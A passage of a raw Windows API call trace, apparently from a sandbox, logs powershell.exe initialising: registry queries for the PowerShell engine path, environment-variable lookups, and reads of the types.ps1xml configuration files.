(pv=0x31a890) [0056.192] CoTaskMemAlloc (cb=0xcc) returned 0x31a890 [0056.192] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31a890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0056.193] CoTaskMemFree (pv=0x31a890) [0056.195] RegCloseKey (hKey=0x328) returned 0x0 [0056.195] CoTaskMemAlloc (cb=0xcc) returned 0x31a890 [0056.195] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31a890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0056.195] CoTaskMemFree (pv=0x31a890) [0056.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda48 | out: phkResult=0xcda48*=0x328) returned 0x0 [0056.196] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd9cc, lpData=0x0, lpcbData=0xcd9c8*=0x0 | out: lpType=0xcd9cc*=0x0, lpData=0x0, lpcbData=0xcd9c8*=0x0) returned 0x2 [0056.196] RegCloseKey (hKey=0x328) returned 0x0 [0056.200] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.201] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.203] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd84c, lpData=0x0, lpcbData=0xcd848*=0x0 | out: lpType=0xcd84c*=0x1, lpData=0x0, lpcbData=0xcd848*=0x74) returned 0x0 [0056.203] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd7bc, lpData=0x0, lpcbData=0xcd7b8*=0x0 | out: lpType=0xcd7bc*=0x1, lpData=0x0, lpcbData=0xcd7b8*=0x74) returned 0x0 [0056.204] CoTaskMemAlloc (cb=0x78) returned 0x2cc040 [0056.204] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xcd78c, lpData=0x2cc040, lpcbData=0xcd788*=0x74 | out: lpType=0xcd78c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd788*=0x74) returned 0x0 [0056.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0056.204] SetErrorMode (uMode=0x1) returned 0x1 [0056.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd710 | out: lpFileInformation=0xcd710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0056.204] SetErrorMode (uMode=0x1) returned 0x1 [0056.206] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.207] CoTaskMemAlloc (cb=0x104) returned 0x32a8f0 [0056.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a8f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0056.211] SetErrorMode (uMode=0x1) returned 0x1 [0056.212] GetFileType (hFile=0x330) returned 0x1 [0056.212] SetErrorMode (uMode=0x1) returned 0x1 [0056.212] GetFileType (hFile=0x330) returned 0x1 [0056.213] ReadFile (in: hFile=0x330, lpBuffer=0x2d794f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d794f0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.214] ReadFile (in: hFile=0x330, lpBuffer=0x2d794f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d794f0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.215] ReadFile (in: hFile=0x330, lpBuffer=0x2d794f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d794f0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.215] ReadFile (in: hFile=0x330, lpBuffer=0x2d794f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d794f0*, lpNumberOfBytesRead=0xcd648*=0xcf3, lpOverlapped=0x0) returned 1 [0056.215] ReadFile (in: hFile=0x330, lpBuffer=0x2d7894b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d7894b*, lpNumberOfBytesRead=0xcd648*=0x0, lpOverlapped=0x0) returned 1 [0056.215] ReadFile (in: hFile=0x330, lpBuffer=0x2d794f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2d794f0*, lpNumberOfBytesRead=0xcd648*=0x0, lpOverlapped=0x0) returned 1 [0056.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0056.217] SetErrorMode (uMode=0x1) returned 0x1 [0056.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd5c0 | out: lpFileInformation=0xcd5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0056.218] SetErrorMode (uMode=0x1) returned 0x1 [0056.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0056.218] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd62c, lpData=0x0, lpcbData=0xcd628*=0x0 | out: lpType=0xcd62c*=0x1, lpData=0x0, lpcbData=0xcd628*=0x56) returned 0x0 [0056.218] CoTaskMemAlloc (cb=0x5a) returned 0x1b7876a0 [0056.218] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5fc, lpData=0x1b7876a0, lpcbData=0xcd5f8*=0x56 | out: lpType=0xcd5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5f8*=0x56) returned 0x0 [0056.236] VirtualQuery (in: lpAddress=0xcc390, lpBuffer=0xcd250, dwLength=0x30 | out: lpBuffer=0xcd250*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0056.245] SetErrorMode (uMode=0x1) returned 0x1 [0056.246] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330 [0056.246] GetFileType (hFile=0x330) returned 0x1 [0056.246] SetErrorMode (uMode=0x1) returned 0x1 [0056.246] GetFileType (hFile=0x330) returned 0x1 [0056.246] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.247] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.247] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.248] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.248] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.249] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.249] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.250] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.250] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.251] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.251] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.251] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.251] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.251] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.252] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.252] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.252] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.253] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.254] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.255] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.255] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.255] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.255] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.256] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.256] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.256] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.256] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.256] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.257] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.259] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.259] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.260] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.261] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1000, lpOverlapped=0x0) returned 1 [0056.261] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x1b4, lpOverlapped=0x0) returned 1 [0056.261] ReadFile (in: hFile=0x330, lpBuffer=0x2de06b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd648, lpOverlapped=0x0 | out: lpBuffer=0x2de06b0*, lpNumberOfBytesRead=0xcd648*=0x0, lpOverlapped=0x0) returned 1 [0056.261] CloseHandle (hObject=0x330) returned 1 [0056.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0056.261] SetErrorMode (uMode=0x1) returned 0x1 [0056.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd5c0 | out: lpFileInformation=0xcd5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0056.261] SetErrorMode (uMode=0x1) returned 0x1 [0056.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0056.262] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6a8 | out: phkResult=0xcd6a8*=0x330) returned 0x0 [0056.262] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd62c, lpData=0x0, lpcbData=0xcd628*=0x0 | out: lpType=0xcd62c*=0x1, lpData=0x0, lpcbData=0xcd628*=0x56) returned 0x0 [0056.262] CoTaskMemAlloc (cb=0x5a) returned 0x1b787780 [0056.262] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5fc, lpData=0x1b787780, lpcbData=0xcd5f8*=0x56 | out: lpType=0xcd5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5f8*=0x56) returned 0x0 [0056.262] CoTaskMemFree (pv=0x1b787780) [0056.262] RegCloseKey (hKey=0x330) returned 0x0 [0056.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0056.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0056.378] VirtualQuery (in: lpAddress=0xcc390, lpBuffer=0xcd250, dwLength=0x30 | out: lpBuffer=0xcd250*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.455] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xcd85c, lpData=0x0, lpcbData=0xcd858*=0x0 | out: lpType=0xcd85c*=0x1, lpData=0x0, lpcbData=0xcd858*=0x74) returned 0x0 [0056.455] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xcd7cc, lpData=0x0, lpcbData=0xcd7c8*=0x0 | out: lpType=0xcd7cc*=0x1, lpData=0x0, lpcbData=0xcd7c8*=0x74) returned 0x0 [0056.455] CoTaskMemAlloc (cb=0x78) returned 0x2cc040 [0056.455] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0xcd79c, lpData=0x2cc040, lpcbData=0xcd798*=0x74 | out: lpType=0xcd79c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd798*=0x74) returned 0x0 [0056.458] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.458] CoTaskMemAlloc (cb=0x5a) returned 0x1b787780 [0056.458] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787780, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.464] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.464] CoTaskMemAlloc (cb=0x5a) returned 0x1b787780 [0056.464] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787780, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.468] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.468] CoTaskMemAlloc (cb=0x5a) returned 0x1b787780 [0056.468] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x1b787780, lpcbData=0xcd398*=0x56 | out: lpType=0xcd39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd398*=0x56) returned 0x0 [0056.505] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3cc, lpData=0x0, lpcbData=0xcd3c8*=0x0 | out: lpType=0xcd3cc*=0x1, lpData=0x0, lpcbData=0xcd3c8*=0x56) returned 0x0 [0056.505] CoTaskMemAlloc (cb=0x5a) returned 0x1b787710 [0056.505] 